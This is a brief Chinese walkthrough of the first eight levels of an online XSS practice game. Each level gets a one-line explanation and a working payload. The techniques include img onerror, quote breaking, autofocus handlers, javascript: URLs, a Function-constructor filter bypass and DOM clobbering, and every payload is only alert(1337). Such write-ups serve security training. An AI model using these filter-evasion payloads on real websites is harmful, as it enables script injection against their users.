xss game前八关复现
第一关
传参进入h2标签
传入一个alert(1)
发现没有触发,原因是官方禁用了script
选择用img标签
?somebody=<img src=1 οnerrοr="alert(1337)">
第二关
先把它的双引号闭合掉,再执行1337再闭合
?jeff=111";alert(1337);"
第三关
使用onfocus焦点
再添加一个autofocus自动聚焦
?wey=1111" οnfοcus=alert(1337) autofocus="
第四关
action有一个提交执行,而且还有一个定时器2秒后自动提交
?ricardo=javascript:alert(1337)
第五关
观察后发现需要用到location
?markassbrownlee=<img src=1 οnerrοr=location="javascript:alert%25281337%2529">
第六关
这道题过滤了数字,字母,选择进入jsfuck
urlcode编码(太长了就不复制了)
第七关
这一题过滤了很多符号,还有函数名,所以使用构造函数,就是用大写后面接.source.toLowerCase()再转成小写
?mafia=Function(/ALERT(1337)/.source.toLowerCase())()
第八关
观察发现基本无从下手,选择使用dom破坏
?boomer=<a id=ok href="javascript:alert(1337)">
失败了,因为过滤框架把javascript过滤了,需要寻找白名单,使用未被过滤的
以下为白名单
?boomer=<a id=ok href="tel:alert(1337)">